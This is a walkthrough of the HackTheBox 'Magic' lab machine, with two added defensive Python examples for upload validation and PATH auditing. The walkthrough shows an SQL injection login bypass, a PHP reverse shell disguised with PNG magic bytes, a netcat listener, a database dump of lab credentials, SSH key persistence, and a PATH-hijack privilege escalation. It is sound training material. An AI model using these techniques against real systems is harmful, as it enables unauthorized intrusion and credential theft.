
[HTB] – Magic

Hello again! Today I'm doing the writeup of Magic, a medium-difficulty Linux box released on April 18th 2020 on HackTheBox.

If you have VIP access on the website, you can access it here: https://www.hackthebox.eu/home/machines/profile/241

Recon

As usual, I'm using nmap to scan for an entry point:

nmap -A -p- -T4 10.10.10.176

I am using the basic options as usual:

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

I got the following results:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:27 CEST
Nmap scan report for 10.10.10.185
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   349.03 ms 10.10.14.1
2   349.02 ms 10.10.10.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.48 seconds

We notice an HTTP server running on port 80 with the http-title Magic Portfolio. This is not the first portfolio we've seen on a HackTheBox machine, and I'm already thinking about a malicious file upload.

Let's navigate to the website and take a look:

10.10.10.185:80

First Access

To perform a malicious file upload, and maybe get a reverse shell, I obviously need a way to upload my file. The inscription in the bottom left corner says:

By clicking Login I get a login form, on which I try some basic SQL injections. The first one that worked was ' or ''=', but you're welcome to find others 🙂

We are then asked to upload a file. How nice, thank you!

I am going to use a well-known PHP reverse shell, but you can choose another one, or even build your own (it's actually not that hard, if you're wondering). The link is: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

A filter prevents us from uploading a PHP file. I tried the basic trick of appending .png to the file name, but that wasn't enough to fool the filter: it seems to check the file's header. So what we need to do is change this header to match the PNG signature.

To do this I retrieved the PNG signature (you can get a list of signatures here: https://en.wikipedia.org/wiki/List_of_file_signatures). I then used a tool called bless, which is basically a hex editor, to remove the first 8 bytes and replace them with the signature:

89 50 4E 47 0D 0A 1A 0A

Our file is ready for upload. If everything went the way it should have, you should get the following message:

(Maybe slightly different depending on the filename you chose 😉 )
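To see why the filter above is bypassable by signature alone, and what a check that is not fooled by it looks like, here is an added example (not code from this writeup or from the box). The inputs are constructed: a stand-in for the disguised upload with the 8 signature bytes glued to PHP-looking text, and a genuine 1x1 PNG built by hand.

```python
"""Magic-byte check vs. a full PNG structure check (added example;
inputs are constructed, not the writeup's actual files)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"   # 89 50 4E 47 0D 0A 1A 0A, the bytes the writeup inserts

def magic_only_check(data: bytes) -> bool:
    """The weak filter: accept anything whose first 8 bytes are the PNG signature."""
    return data[:8] == PNG_SIG

def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def minimal_png() -> bytes:
    """A genuine 1x1 greyscale PNG built by hand (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, greyscale
    idat = zlib.compress(b"\x00\x00")                       # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

def strict_check(filename: str, data: bytes) -> bool:
    """Hardened upload check: exactly one extension and it is .png, valid
    signature, then a full chunk walk (IHDR first, every CRC valid, IEND last,
    no trailing bytes). Text with a borrowed signature fails the walk."""
    name = filename.lower()
    if name.count(".") != 1 or not name.endswith(".png"):
        return False
    if data[:8] != PNG_SIG:
        return False
    pos, first, seen_iend = 8, True, False
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:end])[0]
        if (first and ctype != b"IHDR") or zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False
        first, pos = False, end
        if ctype == b"IEND":
            seen_iend = True
            break
    return seen_iend and pos == len(data)

# Constructed stand-in for the disguised upload: PNG signature glued to
# PHP-looking text. It is not a reverse shell, just enough to show the contrast.
DISGUISED = PNG_SIG + b"<?php /* placeholder body */ ?>"
```

The double-extension rule also catches names like reverseLogs.php.png on its own, before the content is even inspected.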

The final step of getting access is running our malicious code on the remote server. (I love this sentence, it makes it feel very HackerFilmLike, don't you think? 🙂 )

I used dirbuster to locate the folder where the uploaded "images" are stored. I then started a listener:

sudo nc -lvp 443

port 443 being the one I entered in my PHP file (remember to set up a TCP redirection to your computer on this port). Then I requested the uploaded file:

http://10.10.10.185/images/uploads/reverseLogs.php.png

And we got a shell!

Own User

After some enumeration, I found a db.php5 file, which clearly refers to a database.

It mentions credentials and a database name. Let's see what a dump of that database contains:

mysqldump Magic -u theseus --password=iamkingtheseus -X

This gives us an XML-formatted version of the SQL script used to load the database, in the state it was in when it was dumped.

[XML dump; the tags were not preserved. The relevant row holds three fields: 1, admin, Th3s3usW4sK1ng]

Here is our password: Th3s3usW4sK1ng

Now that we have credentials, we can use the su command to log in as theseus. This only works if we have a terminal. To get one, use the following command:

/usr/bin/script -qc /bin/bash /dev/null

Now just su theseus with the password Th3s3usW4sK1ng.

We got user!

And we're done with the user part.

Own Root

To work on a proper terminal, I first add my SSH public key to the ~/.ssh/authorized_keys file, which lets us SSH into the machine as theseus.

On my machine, I generate an SSH key pair:

The next step is to copy the content of my ~/.ssh/id_rsa.pub into the authorized_keys of the remote machine.

[email protected]:~/.ssh$ echo ssh-rsa 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 [email protected] >> authorized_keys

Make sure to use >> instead of > to avoid destroying others' work in progress (it appends the key to the file instead of wiping its content).

Done, we now have proper access to the machine as theseus:

ssh -i id_rsa [email protected]

I use /usr/bin/script -qc /bin/bash /dev/null again to get colour on the terminal. Not essential, but it sure is easier when using enumeration scripts, for example.

Speaking of which, let's upload linPeas.sh and run it:

┌─|Log_s [18:17] :~ 
└──╼ $ scp linPeas.sh [email protected]:/tmp
linPeas.sh                                                         100%  157KB 140.9KB/s   00:01
[email protected]:/tmp$ chmod +x linPeas.sh
[email protected]:/tmp$ ./linPeas.sh > scan.txt

I noticed a setuid file that isn't usually there in /bin:

Indeed, sysinfo isn't a standard binary. Running it prints lots of information about the system. After digging further and some manual enumeration, I made the connection between sysinfo and /usr/bin/lshw: when run, lshw displays part of what sysinfo shows.

A warning also pops up:

WARNING: you should run this program as super-user.

So sysinfo is probably calling lshw with its super-user rights. If we could supply our own lshw, we could do anything with root privileges on the system.

Let's write this file. A simple echo 'echo flag :;cat /root/root.txt' > lshw will do.

Now let's save this file as /tmp/lshw and give it the proper rights:

[email protected]:/tmp$ echo 'echo flag :;cat /root/root.txt' > lshw
echo 'echo flag :;cat /root/root.txt' > lshw
[email protected]:/tmp$ chmod 777 lshw

The last step before running the exploit is to make sure /bin/sysinfo finds our script before it finds the real one. To do so, PATH needs to list /tmp before /usr/bin.

export PATH=/tmp:$PATH

This changes the PATH for the current session: we set it to /tmp followed by the original value via $PATH, which is essential for the rest of the commands to keep working. Remember that entries in PATH are separated by ":". You can check it yourself by running echo $PATH.

Run the exploit:

/bin/sysinfo

And we got the flag!
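The lookup the exploit relies on, side by side with the two things that would have stopped it (a fixed search path inside the privileged helper, and an audit of PATH for world-writable entries), as an added example that is not code from this writeup or from the box. A temporary directory stands in for /tmp and nothing privileged runs.

```python
"""PATH lookup as a SUID helper calling a bare `lshw` sees it, next to a
lookup that ignores the caller's PATH and an audit of the PATH itself
(added example; a temporary directory stands in for /tmp)."""
import os
import stat
import tempfile

TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")   # assumed trusted

def lookup_like_execvp(cmd: str, path_env: str):
    """First file named `cmd` with an execute bit along path_env, left to right."""
    for d in path_env.split(":"):
        cand = os.path.join(d or ".", cmd)
        if os.path.isfile(cand) and os.stat(cand).st_mode & 0o111:
            return cand
    return None

def trusted_lookup(cmd: str):
    """Hardened: resolve only in fixed trusted directories, whatever PATH says."""
    return lookup_like_execvp(cmd, ":".join(TRUSTED_DIRS))

def untrusted_path_entries(path_env: str):
    """Entries an auditor should flag: empty or relative, or world-writable."""
    flagged = []
    for d in path_env.split(":"):
        try:
            world_writable = bool(os.stat(d).st_mode & stat.S_IWOTH)
        except (FileNotFoundError, ValueError):
            world_writable = False
        if not d or not os.path.isabs(d) or world_writable:
            flagged.append(d)
    return flagged

def plant_fake(dirpath: str, name: str = "lshw") -> str:
    """Harmless script standing in for the writeup's /tmp/lshw (constructed)."""
    p = os.path.join(dirpath, name)
    with open(p, "w") as fh:
        fh.write("#!/bin/sh\necho stand-in\n")
    os.chmod(p, 0o755)
    return p

def demo():
    """Returns (hijack_resolves_to_fake, trusted_lookup_unaffected, tmp_flagged)."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o1777)                      # world-writable, like /tmp
        fake = plant_fake(tmp)
        hijacked = f"{tmp}:/usr/bin:/bin"          # mirrors export PATH=/tmp:$PATH
        return (lookup_like_execvp("lshw", hijacked) == fake,
                trusted_lookup("lshw") != fake,
                untrusted_path_entries(hijacked) == [tmp])
```

Any setuid helper that calls lshw by name inherits this problem; calling /usr/bin/lshw by absolute path with a reset environment removes it.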
